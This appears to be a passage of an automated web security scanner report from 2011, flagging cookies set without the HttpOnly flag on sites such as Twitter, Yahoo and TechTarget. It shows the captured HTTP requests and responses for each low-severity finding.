HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:24:25 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: MSIDCookie=5a1b6f4a-11e7-4f95-b279-8f8c261c145c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 15547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /share HTTP/1.1 Host: friendfeed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 22:24:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 0 Vary: Cookie Server: FriendFeedServer/0.1 Location: https://friendfeed.com/account/login?next=%2Fshare Cache-Control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: AT=958258442349434896_1304375087; Domain=.friendfeed.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
AFFICHE_W=aNYEiHwzol9n04;expires=Wed, 01 May 2013 23:04:57 GMT;domain=.weborama.fr;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]&rnd=[RANDOM] HTTP/1.1 Host: ieo.solution.weborama.fr Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/?refresh_ce User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 23:04:57 GMT Server: Apache P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM" Set-Cookie: AFFICHE_W=aNYEiHwzol9n04;expires=Wed, 01 May 2013 23:04:57 GMT;domain=.weborama.fr;path=/ Location: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=40572&clicktag=[URLTRACKING]&rnd=[RANDOM] Content-Length: 340 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://ieo.solution.weborama.fr/fcgi-bin/adserv ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /add HTTP/1.1 Host: it.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Mon, 02 May 2011 22:25:38 GMT Set-Cookie: B=b85h77h6rubr2&b=3&s=u7; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Location: http://it.add.yahoo.com/ Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Age: 0 Connection: close Server: YTS/1.20.0
<html><body>This page has moved, please <a href="http://it.add.yahoo.com/">click here</a> to go to its new location.</body></html><!-- w95.fp.re1.yahoo.com uncompressed/chunked Mon May 2 15:25:38 PDT ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.cookie.js HTTP/1.1 Host: local.virgilio.it Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Alice Mail: e-mail gratis e posta elettronica sicura</title> <meta http-equi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/css/global.css HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/css/searchcio-midmarket_new.css HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:29:37 GMT Server: Apache/2.0.52 Last-Modified: Thu, 10 Mar 2011 00:11:58 GMT ETag: "1c0c03b-bbe-b199ef80" Accept-Ranges: bytes Content-Length: 3006 Content-Type: text/css Set-Cookie: BIGipServermedia-tt=3036792842.20480.0000; path=/
.siteName:after { content: 'SearchCIO-MidMarket';} #headerLogo a { width: 485px; } #headline h1, #articleBody h1, #articleBody h2, .mmContent ul li h5, #tipSeriesToc h4 { color: #8e7770; } #headerNav ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/baynote-lib.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/googleAnalytics.min.js?date=20110429 HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/ieFixScripts.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:29:37 GMT Server: Apache/2.0.52 Last-Modified: Thu, 17 Feb 2011 19:55:00 GMT ETag: "157c3ab-1507-c5ca6d00" Accept-Ranges: bytes Content-Length: 5383 Content-Type: application/x-javascript Set-Cookie: BIGipServermedia-tt=3036792842.20480.0000; path=/
$(document).ready(function ($) {
// for IE6, IE7 & IE8 if ($.browser.msie && $.browser.version < 9) {
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/jquery-1.4.2.min.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/jquery.writeCapture.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:29:35 GMT Server: Apache/2.0.52 Last-Modified: Wed, 23 Jun 2010 20:43:53 GMT ETag: "157c8a3-1026-9889d440" Accept-Ranges: bytes Content-Length: 4134 Content-Type: application/x-javascript Set-Cookie: BIGipServermedia-tt=3036792842.20480.0000; path=/
/** * jquery.writeCapture.js * * Note that this file only provides the jQuery plugin functionality, you still * need writeCapture.js. The compressed version will contain both as as single
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/moScripts.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/tt_scripts.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/* * Global scripts file for TT * Dependency on jQuery */ // Functions and inline scripts // Global declarations ============================================================================ v ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/tt_thickbox-compressed.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServermedia-tt=3036792842.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rms/ux/javascript/writeCapture.js HTTP/1.1 Host: media.techtarget.com Proxy-Connection: keep-alive Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /elsevier/elsevier-com/s?product.journaldescription.939.description&category=cws_home&ns__t=1304389821906 HTTP/1.1 Host: nl.sitestat.com Proxy-Connection: keep-alive Referer: http://www.elsevier.com/wps/find/journaldescription.cws_home/939/description User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 21:30:24 GMT Server: Apache Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="http://www.nedstat.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND NAV COM" Set-Cookie: s1=4DBF227072FC041D; expires=Sat, 30-Apr-2016 21:30:24 GMT; path=/elsevier/elsevier-com/ Location: http://nl.sitestat.com/elsevier/elsevier-com/s?product.journaldescription.939.description&ns_m2=yes&ns_setsiteck=4DBF227072FC041D&category=cws_home&ns__t=1304389821906 Content-Length: 367 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://nl.sitestat.com/elsevier/elsevier-com/s? ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /act.php HTTP/1.1 Host: nxtck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ccv2="eyI1NDM2IjpbMTMwNDM3NDQzMSxudWxsXX0="; tc=1; uuid=15ed6de5-a48a-4f38-af12-26a82a5ca9f8;
Response
HTTP/1.1 200 OK P3P: CP='ALL DSP LAW CUR DEV PSAo PSDo IVAo IVDo CONo HISo OUR STP UNI NAV' Server: NextPerformance/2.0 Set-Cookie: lsa=932c04dbae34d1720ca6fd5cd6179699; Expires=Tue, 01-May-2012 22:26:34 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 9 Date: Mon, 02 May 2011 22:26:34 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: omniture.virgilio.it Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 22:16:15 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26DF96978507A1D7-6000010040005559[CE]; Expires=Sat, 30 Apr 2016 22:16:15 GMT; Domain=.virgilio.it; Path=/ Location: http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&pccr=true&vidn=26DF96978507A1D7-6000010040005559&&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.4.1 Expires: Sun, 01 May 2011 22:16:15 GMT Last-Modified: Tue, 03 May 2011 22:16:15 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www2 Content-Length: 0 Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcs67gfdv000000ggn52ira0x_5q6n/dcs.gif?&dcsdat=1304392414589&dcssip=www.eni.com&dcsuri=/en_IT/home.html&WT.co_f=173.193.214.243-768797744.30148886&WT.vt_sid=173.193.214.243-768797744.30148886.1304392414591&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=22&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Home%20Page%20Eni%20S.p.A.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x903&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.5.0&WT.dl=0&WT.ssl=0&WT.es=www.eni.com/en_IT/home.html&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1 Host: sdc.eni.it Proxy-Connection: keep-alive Referer: http://www.eni.com/en_IT/home.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 303 Object Moved Connection: close Date: Mon, 02 May 2011 22:14:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcs67gfdv000000ggn52ira0x_5q6n/dcs.gif?dcsredirect=1&dcsdat=1304392414589&dcssip=www.eni.com&dcsuri=/en_IT/home.html&WT.co_f=173.193.214.243-768797744.30148886&WT.vt_sid=173.193.214.243-768797744.30148886.1304392414591&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=22&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Home%20Page%20Eni%20S.p.A.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x903&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.5.0&WT.dl=0&WT.ssl=0&WT.es=www.eni.com/en_IT/home.html&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 Content-Length: 0 Set-Cookie: WEBTRENDS_ID=173.193.214.243-768797744.30148886; expires=Thu, 29-Apr-2021 22:14:27 GMT; path=/dcs67gfdv000000ggn52ira0x_5q6n P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Last-Modified: Wed, 07 Mar 2007 10:00:42 GMT Accept-Ranges: bytes ETag: "0813e779f60c71:b5c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My03Njg3OTc3NDQuMzAxNDg4ODYAAAAAAAABAAAACAAAAIQtv02ELb9NAQAAAAEAAACELb9NhC2/TQAAAAA-; path=/; expires=Thu, 29-Apr-2021 22:17:40 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Date: Mon, 02 May 2011 22:17:39 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bin/search HTTP/1.1 Host: search.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 22:26:52 GMT Set-Cookie: B=bpo29tt6rubtc&b=3&s=kb; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: sSN=3eSvUDo2wWFRGwNfu4Zai5tBVkIRVcnL10fjiylXzSdqNCm1Gni_b8k7hSc2rpURGtOsHmJqBbg7yUFu05.v1w--; path=/; domain=.search.yahoo.com Location: http://search.yahoo.com/web?fr= Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 86
<!-- syc13.search.ac2.yahoo.com uncompressed/chunked Mon May 2 15:26:52 PDT 2011 -->
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServervgn7-web=704759818.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://media.techtarget ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 303 Object Moved Connection: close Date: Mon, 02 May 2011 22:18:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcsjmy4y8000000w06qbhlh4j_1w6c/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1304392445956&dcssip=www.ansa.it&dcsuri=/&WT.co_f=173.193.214.243-1124471968.30145892&WT.vtid=173.193.214.243-1124471968.30145892&WT.vtvs=1304392445957&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=22&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=ANSA.it&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x903&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.ansa.it/&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 Content-Length: 0 Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAALAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtNN/QAAC3mvU3q5b1N98wAAAaovk0EqL5N9foAAGHwvk1e8L5NY88AAMMtv03DLb9NCwAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TbJPAAAt5r1N6uW9TWVJAAAGqL5NBKi+TU5QAABh8L5NXvC+TRRLAADDLb9Nwy2/TQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
guest_id=130437523139125964; path=/; expires=Wed, 01 Jun 2011 22:27:11 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 302 Found
Date: Mon, 02 May 2011 22:27:11 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Fhome
X-Runtime: 0.00223
Content-Type: text/html; charset=utf-8
Content-Length: 119
Cache-Control: no-cache, max-age=300
Set-Cookie: k=173.193.214.243.1304375231389892; path=/; expires=Mon, 09-May-11 22:27:11 GMT; domain=.twitter.com
Set-Cookie: guest_id=130437523139125964; path=/; expires=Wed, 01 Jun 2011 22:27:11 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIhxodHRwOi8vdHdpdHRlci5jb20vaG9tZToPY3Jl%250AYXRlZF9hdGwrCKCD0rIvAToHaWQiJWVkMDQwMDM5MTUxZDJkNmI5OGQzMjky%250AZjFjYjE1ZDEwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6%250ARmxhc2hIYXNoewAGOgpAdXNlZHsA--e2b470aa48dea5747a392b14a3b018beebbcd5c9; domain=.twitter.com; path=/; HttpOnly
Expires: Mon, 02 May 2011 22:32:11 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
